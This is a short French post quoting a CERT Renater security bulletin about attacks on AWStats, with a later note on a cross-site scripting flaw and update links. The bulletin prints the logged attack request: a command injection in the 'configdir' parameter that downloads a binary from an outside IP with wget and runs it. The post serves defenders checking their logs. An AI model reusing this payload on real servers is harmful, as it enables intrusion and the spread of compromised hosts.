Faille de sécurité sur AWStats

Je cite le bulletin hebdomadaire du CERT Renater du 04/11/05 au 10/11/05:

Citation :

Une autre machine sous Linux avec un serveur Apache a ete attaquee au
niveau du script awstats.pl. Elle a ensuite tente d'attaquer d'autres adresses
via cette meme faille. La detection de ces flux avec ethereal a permi de
mettre au jour cette attaque.

Afin de verifier dans les fichiers de log d'Apache, les commandes
lancees lors de cette attaque ont ete les suivantes:

GET /awstats/awstats.pl configdir=|echo;echo YYY;cd /tmp;wget
24.224.174.18/listen;chmod +x listen;./listen 216.102.212.115;
echo YYY;echo|

Nous avons detecte aujourd'hui en temps reel une dizaine de serveurs web
sous Apache infectees avec cette meme methode. Parmi les machines
infectees certaines d'entres elles ont ensuite lance des attaques de
type deni de service.

La mise a jour de l'outil AWSTATS.pl est toujours d'actualite :
http://awstats.sourceforge.net

Aujourd'hui (vendredi 21 avril 2006) :

Un nouvel avis sur une vulnerabilite presente au niveau
du parametre "config" de l'outils "awstats.pl" vient
d'etre publie. Cette faille n'est pas encore mis a jour
par l'editeur. Cette attaque de type "Cross Site Scripting"
ne permet pas d'executer directement du code mais peut en
fonction du langage script utilise permettre de nombreuses
autres actions.
Reference: http://secunia.com/advisories/19725/

Pour l'instant la derniere version stable est la 6.5.
http://awstats.sourceforge.net/

Rappel sur les attaques "Cross Site Scripting":
http://www.certa.ssi.gouv.fr/site/CERTA-2002-INF-001/